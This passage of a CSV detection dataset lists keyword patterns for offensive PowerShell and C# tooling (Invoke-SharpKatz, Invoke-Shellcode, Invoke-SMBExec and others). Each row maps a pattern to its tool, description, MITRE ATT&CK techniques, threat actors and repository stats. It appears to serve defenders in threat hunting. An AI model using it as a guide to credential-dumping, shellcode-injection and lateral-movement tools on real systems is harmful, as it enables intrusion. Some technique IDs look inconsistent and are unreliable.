TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharphound4*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpImpersonation*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpImpersonation*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpImpersonationNoSpace*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpKatz*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpLdapRelayScan*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpLdapRelayScan*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Sharplocker*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpLoginPrompt*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpMove*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpPrinter*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpPrinter*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpPrintNightmare*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpRDP*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpRDP.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SharpSCCM*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpSCCM*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpSecDump*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharpshares*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpSniper*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpSploit*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharpsploit_nomimi*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpSpray*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpSSDP*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpStay*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpUp*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpUp*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Sharpview*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpWatson*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharpweb*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharpweb*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpWeb.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SharpWSUS*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Shellcode -Shellcode*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-Shellcode*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-Shellcode*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,1,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*Invoke-Shellcode*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Invoke-Shellcode.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Shellcode.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-ShellcodeMSIL*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ShellCommand*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SlinkyCat*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,1,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*Invoke-SMBAutoBrute*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-SMBAutoBrute*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SMBAutoBrute.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SMBAutoBrute*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*invoke-smbclient *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-SMBClient*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SMBEnum*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*invoke-smbexec *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-SMBExec*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SMBExec*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SMBExec.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SMBExec.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*invoke-smblogin *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 